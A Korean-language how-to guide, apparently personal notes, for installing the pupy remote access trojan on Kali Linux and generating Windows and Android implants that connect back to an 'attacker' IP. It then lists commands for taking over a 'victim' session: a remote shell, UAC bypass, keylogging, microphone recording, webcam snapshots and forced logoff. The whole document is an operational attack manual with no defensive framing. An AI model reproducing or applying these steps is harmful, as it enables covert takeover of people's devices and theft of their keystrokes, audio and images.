* PUPY 설치 및 간략한 사용 가이드 *
[네트워크 연결 필요함]
OS : Kali Linux
VM : Virtual Box
RAT( Remote Access Trojan or Remote Administration Tool) 도구 pupy 설치 및 사용방법
> git clone https://github.com/n1nj4sec/pupy.git
> git submodule init
> git submodule update
cd ~/pupy/pupy 안에 파이썬 모듈이 들어있는 파일(requirements.txt) 가 있음
이 파일을
> pip install -r requirements.txt
로 한번에 설치해주기
* 사용 명령어(.exe 파일 만들기)
cd ~/pupy/pupy 안에 pupygen.py 있음
./pupygen.py -O (피해자컴퓨터 OS) -A (피해자컴퓨터 아키텍쳐) -o (실행파일 이름.확장자) connect --host (공격자컴퓨터 IP) --transport ssl
예시) ./pupygen.py -O windows -A x64 -o ips.exe connect --host 192.168.0.17 --transport ssl
예시 - 안드로이드) ./pupygen.py -O android -o nd.apk connect --host 192.168.0.17 --transport ssl
------------------------------------------------------------------------------------------------------------------------------------
>>> sessions -l
으로 연결된 기기 확인. 그러면 연결된 기기가 쭉 나열됨.
거기서 연결하고 싶은 기기의 id 확인.
>>> sessions -i (연결기기 id)
결과) [+] default filter set to (id) -> (연결되었다는 의미)
------------------------------------------------------------------------------------------------------------------------------------
>>> info
입력시 세션(연결된 기기)의 자세한 정보가 출력.
------------------------------------------------------------------------------------------------------------------------------------
>>> shell
입력시 해당 windows의 cmd 창처럼 사용가능함.(ipconfig, taskmgr 등 cmd에서처럼 사용가능.)
칼리 리눅스는 한글(949)을 지원 안하기 때문에, cmd 창의 언어를 바꿔줄 필요가 있다.
-> chcp 437(영어:437,한글:949)
cmd 종료 : exit 입력
*유용한 cmd 명령어*
1. systeminfo : 호스트,OS버전,OS설치날짜,CPU정보,메모리,물리적메모리와가상메모리,핫픽스정보,랜카드정보,IP정보 출력
2. msconfig(시스템구성) : 일반,부팅,서비스,시작프로그램,도구 등 OS부팅에 관한 중요한사항을 조정할 수 있는 시스템구성
3. regedit(레지스트리 편집기) : 레지스트리를 편집할 수 있는 프로그램
4. dxdiag : direct x 진단도구, 그래픽과 사운드의 세부정보를 보여주는 것
5. ipconfig : 랜카드정보와 IP정보를 보여주는 명령어
6. taskmgr : Windows 작업관리자, 응용프로그램,프로세스,서비스,성능,네트워킹,사용자의 정보를 보여줌
7. gpedit.msc(로컬그룹정책편집기) : 여기서 "로컬 컴퓨터 정책" - "관리 템플릿" 을 클릭해서 바탕화면,작업표시줄 및 시작메뉴,제어판,시스템 등 사용자가 직접 기능을 제어할 수 있음.
8. compmgmt.msc(컴퓨터관리:computer management) : 작업스케쥴러,이벤트뷰어,장치관리자,디스크관리,서비스항목 등 여러가지 시스템을 컨트롤하는 명령어
9. diskmgmt(디스크관리:disk management) : 시스템의 HDD 정보와 파티션정보를 보여주고 조정하는 시스템유틸
10. devmgmt.msc(장치관리자:device management) : 컴퓨터의 장치드라이버를 보여주는 명령어
11. lusrmgr.msc(로컬사용자그룹:local user manager) : 내 컴퓨터에 로그인 사용자나 네트워크 그룹을 알 수 있는 유틸리티
12. servics.msc(서비스) : 윈도우서비스항목을 컨트롤하는 유틸, 운영체제 로딩을 빠르게하기 위해 불필요한 서비스항목을 disable 하는데 많이 사용함.
------------------------------------------------------------------------------------------------------------------------------------
!주의
./pupysh.py 로 실행하는 pupy shell 을 >> exit 로 종료하는 것이 아닌 Ctrl + Z 로 강제종료할 시 터미널을 껐다가 켜야 정상 재작동됨.
------------------------------------------------------------------------------------------------------------------------------------
[간략한 모듈 설명] (자세한건 -h 옵션 사용하세요!)
|
>> run admin/dns |
대상의 IP Address 필요 |
IP, Host name 나열 |
|
>> run admin/getpid |
X |
pupy 로 만든 exe 파일 processor PID 와 Name 나열 |
|
>> run network/port_scan |
대상의 IP Address 필요 |
해당 IP에 열려있는 포트 알려줌, -p (PORTS) 로 특정 포트의 open/close 여부 확인가능 |
|
>> run privesc/bypassuac |
X |
?? 이건 무슨기능일까 |
|
>> run gather/keylogger |
{start | stop | dump} |
start 입력: 키보드 입력저장, dump 입력: terminal에 출력, stop 입력: 키보드 입력저장 중지(한글인식 X) |
|
>> run gather/record_mic |
X |
-t (시간) 으로 녹음시간 저장가능, -v 옵션은 녹음파일 바로실행. |
|
>> run gather/webcamsnap |
X |
노트북에 달린 웹캠으로 사진 바로찍음 |
|
>> run manage/lock_screen |
X |
강제로 로그오프 시킴. |